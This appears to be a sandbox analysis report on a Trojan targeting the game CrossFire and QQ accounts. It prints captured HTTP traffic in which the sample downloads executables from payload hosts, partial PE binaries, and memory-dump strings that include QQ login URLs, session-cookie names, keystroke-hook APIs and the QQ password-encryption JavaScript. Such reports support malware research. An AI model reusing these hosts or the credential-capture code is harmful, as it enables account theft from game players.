VTqxbH9qLnb0sIP0MP7pRTfw6nroTzS5W3/skPr7Mve17KNLSzLqX7M07X9vya wsQbw43Muxiey0 c5HzCpz2fukaM/wacwObNtD

<<< skipped >>>

GET / HTTP/1.1

Host: publodf.kintip.com.cn

Cache-Control: no-cache

Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Content-Location: hXXp://publodf.kintip.com.cn/iisstart.htm

Last-Modified: Wed, 21 Dec 2016 05:14:24 GMT

ETag: "2c246518495bd21:812"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b484d5935990-VIE

452..<html>.<head>.<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=gb2312">.<title ID=titletext>......</title>.</head>.<body bgcolor=white>.<table>.<tr>.<td ID=tableProps width=70 valign=top align=center>.<img ID=pagerrorImg src="pagerror.gif" width=36 height=48>.<td ID=tablePropsWidth width=400>.<h1 ID=errortype style="font:14pt/16pt ...., verdana; color:#4e4e4e">.<P ID=Comment1> <P ID="errorText">......7</h1>.<P ID=Comment2> <P ID="errordesc"><font style="font:9pt/12pt ....; color:black">..................................................................<P ID=term1>...............................................................<hr size=1 color="blue">.<P ID=message1>..

HEAD /adpub//01.txt HTTP/1.1

User-Agent: MyAppByMulinB

Host: xzdownad.zglhsw.com

Content-Length: 0

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:22 GMT

Content-Type: text/plain

Content-Length: 563200

Connection: keep-alive

Set-Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681; expires=Mon, 19-Feb-18 03:41:21 GMT; path=/; domain=.zglhsw.com; HttpOnly

Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT

Accept-Ranges: bytes

ETag: "f42d639e4289d21:1466"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b3e146ed59ae-VIE

....

GET /adpub//01.txt HTTP/1.1

User-Agent: MyAppByMulinB

Host: xzdownad.zglhsw.com

Cache-Control: no-cache

Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:22 GMT

Content-Type: text/plain

Content-Length: 563200

Connection: keep-alive

Last-Modified: Fri, 17 Feb 2017 17:23:56 GMT

Accept-Ranges: bytes

ETag: "f42d639e4289d21:1466"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b3e5d77359ae-VIE

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PC.{.".(.".(.".({Th(.".(..](.".(..i(.".(..h(V".(.Z@(.".(.ZP(.".(.".(.#.(..l(.".(..Y(.".(..^(.".(Rich.".(................PE..L...oE]V.....................................0....@..................................W....@.................................@...,................................K...5..................................@............0.. ............................text............................... ..`.rdata.......0......................@..@.data...DO...0...*..................@....rsrc................4..............@..@.reloc...e.......f...2..............@..B........................................................................................................................................................................................................................................................................................................................................U..j.h..D.d.....P........0F.3..E.VWP.E.d.....3...(....}.3...iE...0.....D.........@.....0.........WWWWW.E.....4E...(...;.ul.{..C.......0...............D....r...0...P..y.......D.........@.........0.....E......E.....H........J........M.Wh....WWQP..|4E...;.u/.{..C.......0.........G.....D....r...0...R.v...W.. ...Q..$...Rh... V..$..... ..........4E...........$.......r&.{..C.......0.....................4...h......M...WQ..L..............,...Rh......L...PV..,......4E.9.,...tk....$......L....P...$......@..u. .P..L...

<<< skipped >>>

HEAD /aload/cp/NamuADLook.dll HTTP/1.1

User-Agent: MyAppByMulinB

Host: xzdownad.zglhsw.com

Content-Length: 0

Cache-Control: no-cache

Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:29 GMT

Content-Type: application/x-msdownload

Content-Length: 345088

Connection: keep-alive

Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT

Accept-Ranges: bytes

ETag: "309aa5428a74d21:1466"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b413e45159ae-VIE

....

GET /aload/cp/NamuADLook.dll HTTP/1.1

User-Agent: MyAppByMulinB

Host: xzdownad.zglhsw.com

Cache-Control: no-cache

Cookie: __cfduid=d3ad837f1fdf068f003c11a487bda472c1487475681

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 03:41:30 GMT

Content-Type: application/x-msdownload

Content-Length: 345088

Connection: keep-alive

Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT

Accept-Ranges: bytes

ETag: "309aa5428a74d21:1466"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 3336b41634a559ae-VIE

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.............N|......NH.)....NI.......a.......q.........}.............a......NM......Ny......Nx......N......Rich....................PE..L...on.X...........!.....$...........{.......@......................................9.....@.............................H............P.......................`..@0...D..................................@............@...............................text....".......$.................. ..`.rdata..X....@.......(..............@..@.data...DE....... ..................@....rsrc........P......................@..@.reloc...B...`...D..................@..B........................................................................................................................................................................................................................................................................................................................U..j.h.#..d.....PQV. ...3.P.E.d......u..E......E...........P..............E.....V.E......#.........M.d......Y^..]...............U....u.3.]....P...@..u.VWj.j. .PSj.h.......@....3..G...............Q. J.....D?.Pj.V.Ht........H...@..u.WV .PSj.h.......@...}.Vh.t............t.V..M....._.....^]................U..QW....u._..].SVW..$A..j.j.j.j...SWj.h......@B...E.@P.}I.........u.^[_..]..E.j.j.PVSWj.h......@B....0....P..I...@..u..]. ...V.......V..L.......3.9A.^[..._..].U..Q..V.7.A....;.tI.~..S.^.|4..;.u.......E......

<<< skipped >>>

HEAD /aload/as/33.txt HTTP/1.1

User-Agent: MyAppByMulinB

Host: down.9udn.com

Content-Length: 0

Cache-Control: no-cache

HTTP/1.0 200 OK

Content-Length: 40

Content-Type: text/plain

Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT

Accept-Ranges: bytes

ETag: "1ee814e288d21:1466"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sun, 19 Feb 2017 03:47:16 GMT

X-Cache: HIT from ctzjwzs2

Via: 1.0 ctzjwzs2 (squid)

Connection: keep-alive

HTTP/1.0 200 OK..Content-Length: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:1466"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sun, 19 Feb 2017 03:47:16 GMT..X-Cache: HIT from ctzjwzs2..Via: 1.0 ctzjwzs2 (squid)..Connection: keep-alive..

GET /blog/static/26993501420171281319931/ HTTP/1.1

Accept: */*

Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: baike2016.blog.163.com

Cache-Control: no-cache

Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 19 Feb 2017 03:41:14 GMT

Content-Type: text/html;charset=GBK

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Set-Cookie: NTESBLOGSI=6940DB1C86E784EA6CBDE5BD19B3ED96.yqblog8-8010; Domain=.blog.163.com; Path=/

b49.. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.. <html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">.. <head>.. <meta http-equiv="X-UA-Compatible" content="IE=7" />.. <meta http-equiv="content-type" content="text/html;charset=gbk"/>.. <meta http-equiv="content-style-type" content="text/css"/>.. <meta http-equiv="content-script-type" content="text/javascript"/>.. <meta name="version" content="neblog-1.0"/>.. <script type="text/javascript">.. .. .. document.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=location.hash); .. document.domain = location.hostname.replace(/^.*\.([\w] \.[\w] )$/,'$1');.. window.focus();.. window.getMusicTimeStamp=function(){return 'db4721d88d4cf492bc8388e52f709b99';};.. .. //BLOG-647:....OS.............................. (function(){.. window.setTimeout(function(){.. var _loginUserIcon = document.getElementById('loginUserIcon');.. var _rsavatarimg = document.getElementById('rsavatarimg');.. if(!!_loginUserIcon){.. var _loaded1 = false;.. var _img1 = new Image();.. _img1.onload = function(){.. _loaded1 = true;.. _img1.onload = null;.. };.. _img1.src = _loginUserIcon.src;.. window.setTimeout(function(){.. if(!_loaded1){..

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_3308:

`.rsrc

).pU

t$(SSh

~%UVW

u$SShe

wininet.dll

ole32.dll

kernel32.dll

user32.dll

User32.dll

Kernel32.dll

shell32.dll

gdiplus.dll

GdiPlus.dll

Ole32.dll

OleAut32.dll

oleaut32.dll

gzip.dll

ntdll.dll

gdi32.dll

Gdi32.dll

imm32.dll

OLEACC.DLL

advapi32.dll

shlwapi.dll

atl.dll

MsgWaitForMultipleObjects

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

ShellExecuteA

GetProcessHeap

GetAsyncKeyState

GdipSetStringFormatHotkeyPrefix

RegisterHotKey

UnregisterHotKey

GetUrlCacheEntryInfoA

RegCloseKey

RegCreateKeyA

RegOpenKeyA

GetWindowsDirectoryA

GdiplusShutdown

%d-d-d d:d:d

hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=

"sMsg":"

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

hXXp://

hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=

1970-01-01 08:00:00

[VVV.111Ttt.com]

-URL:

%Program Files%\Internet Explorer\iexplore.exe

crossfire.exe

MsgBox

SysShadow.SubWnd

\exdui.dll

.rsrc

@V.Dv

.UmKm

4v %u

oft.XMLDOMnY

\dwmapi.dll

A715A0-6587-11D0-924A_20AFC7/

Leave.CoIn@alize

number is %d.

:"%s"

..0`%X

KERNEL32.DLL

ADVAPI32.dll

ATL.DLL

GDI32.dll

MSVCRT.dll

OLEAUT32.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

exdui.dll

t=.VMV

%%fnW

,7Z.in

k`%u"]

T.ZQ2

CDKEY

CDKEY:

ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}

ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}

ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|

OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|

OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|

MB,EE9KR?WC [I7WT

wW.Gg

NA EE9KR?WC [I7WT

NA FE9KR?WC [I7WT

Z|.Gw

MA,FE9KR?WC*[I7WT

MA,FE9KR?WC*ZI7WT

MA,EE9KR?WC*ZI7WT

NA,FE9KR?WC*ZI7WT

l.er;

MA,FE9KR?WC*ZI7WT

8`!%x

MA,FE9KR?WC*ZI7WT

MA,FE9KR?WC ZI7WT

MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|

MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|

MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|

.pQ\ a

.NaH-*

!)!!))!)-*1-(333:73_

%XE%Z

dj%d~

.PXF3

02/24/16

%UD-Od

lI*wt.KK

%4u3\2t

W.ctn

.yEXjmS

Yn7%X

..RZd

A$#%DR

Wx.xlu

n.mJ~f#

Il%UVl_

.mDB`

.ijWU5

w%SY

Wkbn%X

kEYH

&.kPd

(s.PKL

>%fZM

T2%xE

dQ]%U

#.mkTSx

.Ag.~

%f%%f

7".Fv

>.OsM

r.vDO

V2.6.0

\CF_data.ini

hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=

hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/

hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public

hXXp://xinzyw.com/cf.txt

hXXp://cfzhushou.com/cf.txt

hXXp://VVV.cfzhushou.com

.text

`.rdata

@.data

CF_Helper.dll

hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/

\CF_Helper.dll

@.reloc

%Program Files%\sesvcs_%d_56089.exe

sesvcs_%d_56089.exe

hXXp://down.9udn.com/aload/as/33.txt

%Program Files%\23.txt

%Program Files%\NamuADLook.dll

hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL

\xxx\Helper.pdb

Helper.dll

KERNEL32.dll

InternetCrackUrlA

HttpQueryInfoW

WININET.dll

GetCPInfo

zcÃ

true

7.84888

6 696?6{6

14686

5 5(50585

? ?$?,?@?`?

>$>0>4>8>

%d&&'

123456789

00003333

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

WinExec

GetKeyState

GetViewportOrgEx

WINSPOOL.DRV

RegOpenKeyExA

RegCreateKeyExA

COMCTL32.dll

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

#include "l.chs\afxres.rc" // Standard components

cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,

PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\

01/04/17

&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0

&service=login&nodirect=0&ptsigx=

hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=

p_skey=

skey=

szNick_name=

hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_

hXXp://VVV.51.la/report/1_main.asp?id=18855916

hXXp://VVV.51.la/report/1_main_online.asp?id=18855916

hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43

hXXp://count.knowsky.com/img/(.*?)/(.*?).gif

hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=

hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=

tEXtXML:com.adobe.xmp

xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"

xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"

xmlns:dc="hXXp://purl.org/dc/elements/1.1/"

xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"

xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"

xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"

xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"

xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">

Adobe Photoshop CC (Windows)

/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737

msg":"

hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992

hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464

Ã¿F8>NFFFh

Ã¿FV

,.Ey)

qTcp,

hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes

&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769

hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=

&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&

hXXp://ptlogin2.qq.com/login?u=

&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0

hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=

return binl2hex(core_md5(str2binl(s), s.length * chrsz))

return binl2str(core_md5(str2binl(s), s.length * chrsz))

function hex_hmac_md5(key, data) {

return binl2hex(core_hmac_md5(key, data))

function b64_hmac_md5(key, data) {

return binl2b64(core_hmac_md5(key, data))

function str_hmac_md5(key, data) {

return binl2str(core_hmac_md5(key, data))

for (var i = 0; i

function core_hmac_md5(key, data) {

var bkey = str2binl(key);

if (bkey.length > 16) {

bkey = core_md5(bkey, key.length * chrsz)

ipad[i] = bkey[i] ^ 909522486;

opad[i] = bkey[i] ^ 1549556828

var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);

return core_md5(opad.concat(hash), 512 128)

for (var i = 0; i

bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)

for (var i = 0; i

str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)

for (var i = 0; i

str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)

for (var i = 0; i

if (i * 8 j * 6 > binarray.length * 32) {

str = tab.charAt((triplet >> 6 * (3 - j)) & 63)

for (var i = 0; i

arr.push('\\x' str.substr(i, 2))

arr = arr.join('');

function getEncryption(password, salt, vcode, isMd5) {

password = password || '';

var md5Pwd = isMd5 ? password: md5(password),

rsaH1 = $.RSA.rsa_encrypt(h1),

rsaH1Len = (rsaH1.length / 2).toString(16),

hexVcode = TEA.strToBytes(vcode.toUpperCase()),

vcodeLen = '000' vcode.length.toString(16);

while (rsaH1Len.length

TEA.initkey(s2);

var saltPwd = TEA.enAsBase64(rsaH1Len rsaH1 TEA.strToBytes(salt) vcodeLen hexVcode);

TEA.initkey('');

return saltPwd.replace(/[\/\ =]/g,

'/': '-',

' ': '*',

'=': '_'

function getRSAEncryption(password, vcode, isMd5) {

var str1 = isMd5 ? password: md5(password);

var str2 = str1 vcode.toUpperCase();

var str3 = $.RSA.rsa_encrypt(str2);

$.RSA = function() {

while (z aD

t = aC.substring(z, z aD) '\n';

return t aC.substring(z, aC.length)

return '0' t.toString(16)

return t.toString(16)

if (aG

var aC = aD.length - 1;

var aE = aD.charCodeAt(aC--);

z.nextBytes(t)

this.dmp1 = null;

this.dmq1 = null;

this.coeff = null

if (z != null && t != null && z.length > 0 && t.length > 0) {

uv_alert('Invalid RSA public key')

return t.modPowInt(this.e, this.n)

var t = ah(aC, (this.n.bitLength() 7) >> 3);

var aD = this.doPublic(t);

var z = aD.toString(16);

if ((z.length & 1) == 0) {

N.prototype.doPublic = Y;

N.prototype.setPublic = q;

N.prototype.encrypt = r;

this.fromNumber(z, t, aC)

this.fromString(z, 256)

this.fromString(z, t)

aG = Math.floor(aC / 67108864);

if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {

au.prototype.am = aA;

if (ab && (navigator.appName != 'Netscape')) {

au.prototype.am = b;

au.prototype.am = az;

au.prototype.DB = ay;

au.prototype.DM = ((1

au.prototype.DV = (1

au.prototype.FV = Math.pow(2, ac);

au.prototype.F1 = ac - ay;

au.prototype.F2 = 2 * ay - ac;

ar = '0'.charCodeAt(0);

ar = 'a'.charCodeAt(0);

ar = 'A'.charCodeAt(0);

return ag.charAt(t)

var aC = ai[z.charCodeAt(t)];

z.fromInt(t);

this.fromRadix(aG, z);

var aF = aG.length,

if (aG.charAt(aF) == '-') {

if (aE aD > this.DB) {

this[this.t - 1] |= (t & ((1

this[this.t ] = (t >> (this.DB - aE))

if (aE >= this.DB) {

aE -= this.DB

this[this.t - 1] |= ((1

this.clamp();

au.ZERO.subTo(this, this)

var t = this.s & this.DM;

return '-' this.negate().toString(z)

return this.toRadix(z)

var aG = this.DB - (aD * this.DB) % aC;

if (aG > aG) > 0) {

aH |= this[--aD] >> (aG = this.DB - aC)

aG = this.DB; --aD

au.ZERO.subTo(this, t);

return (this.s

return this.DB * (this.t - 1) l(this[this.t - 1] ^ (this.s & this.DM))

z.t = Math.max(this.t - aC, 0);

var z = aH % this.DB;

var t = this.DB - z;

var aE = Math.floor(aH / this.DB),

aG = (this.s

aD.clamp()

var aE = Math.floor(aG / this.DB);

var z = aG % this.DB;

t = Math.min(z.t, this.t);

aD[aC ] = aE & this.DM;

aE >>= this.DB

aD[aC ] = aE & this.DM;

aE >>= this.DB

aD[aC ] = this.DV aE

var t = this.abs(),

aE = z.abs();

aD[aC t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)

aD.clamp();

au.ZERO.subTo(aD, aD)

var t = this.abs();

var aD = t.am(z, t[z], aC, 2 * z, 0, 1);

if ((aC[z t.t] = t.am(z 1, 2 * t[z], aC, 2 * z 1, aD, t.t - z - 1)) >= t.DV) {

aC[z t.t] -= t.DV;

aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)

aC.clamp()

var aQ = aK.abs();

var aI = this.abs();

aH.fromInt(0)

this.copyTo(aG)

var aP = this.DB - l(aQ[aQ.t - 1]);

aQ.lShiftTo(aP, aE);

aI.lShiftTo(aP, aG)

aQ.copyTo(aE);

aI.copyTo(aG)

var aT = this.FV / aL,

aE.dlShiftTo(aN, aF);

if (aG.compareTo(aF) >= 0) {

aG.subTo(aF, aG)

au.ONE.dlShiftTo(aM, aF);

aF.subTo(aE, aE);

var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT (aG[aO - 1] aR) * aS);

if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM))

aE.dlShiftTo(aN, aF);

aG.subTo(aF, aG);

aG.subTo(aF, aG)

aG.drShiftTo(aM, aH);

au.ZERO.subTo(aH, aH)

aG.clamp();

aG.rShiftTo(aP, aG)

au.ZERO.subTo(aG, aG)

this.abs().divRemTo(t, null, z);

if (this.s 0) {

t.subTo(z, z)

if (t.s = 0) {

return t.mod(this.m)

t.divRemTo(this.m, null, t)

t.multiplyTo(aC, z);

this.reduce(z)

t.squareTo(z);

M.prototype.convert = X;

M.prototype.revert = am;

M.prototype.reduce = L;

M.prototype.mulTo = J;

M.prototype.sqrTo = aw;

z = (z * (2 - t * z % this.DV)) % this.DV;

return (z > 0) ? this.DV - z: -z

this.mp = t.invDigit();

this.mpl = this.mp & 32767;

this.mph = this.mp >> 15;

this.um = (1

this.mt2 = 2 * t.t

t.abs().dlShiftTo(this.m.t, z);

z.divRemTo(this.m, null, z);

if (t.s 0) {

this.m.subTo(z, z)

t.copyTo(z);

this.reduce(z);

while (t.t

var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)

t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);

while (t[z] >= t.DV) {

t[z] -= t.DV;

t.clamp();

t.drShiftTo(this.m.t, t);

if (t.compareTo(this.m) >= 0) {

t.subTo(this.m, t)

g.prototype.convert = al;

g.prototype.revert = av;

g.prototype.reduce = R;

g.prototype.mulTo = B;

g.prototype.sqrTo = ao;

return au.ONE

aF = aI.convert(this),

aF.copyTo(aG);

aI.sqrTo(aG, aC);

aI.mulTo(aC, aF, aG)

return aI.revert(aG)

if (aC

return this.exp(aC, aD)

au.prototype.copyTo = aa;

au.prototype.fromInt = p;

au.prototype.fromString = y;

au.prototype.clamp = Q;

au.prototype.dlShiftTo = at;

au.prototype.drShiftTo = Z;

au.prototype.lShiftTo = v;

au.prototype.rShiftTo = n;

au.prototype.subTo = ad;

au.prototype.multiplyTo = F;

au.prototype.squareTo = S;

au.prototype.divRemTo = G;

au.prototype.invDigit = D;

au.prototype.isEven = k;

au.prototype.exp = A;

au.prototype.toString = s;

au.prototype.negate = T;

au.prototype.abs = an;

au.prototype.compareTo = I;

au.prototype.bitLength = w;

au.prototype.mod = P;

au.prototype.modPowInt = ap;

au.ZERO = c(0);

au.ONE = c(1);

d(new Date().getTime())

if (navigator.appName == 'Netscape' && navigator.appVersion

var H = window.crypto.random(32);

for (K = 0; K

W[ae ] = H.charCodeAt(K) & 255

K = Math.floor(65536 * Math.random());
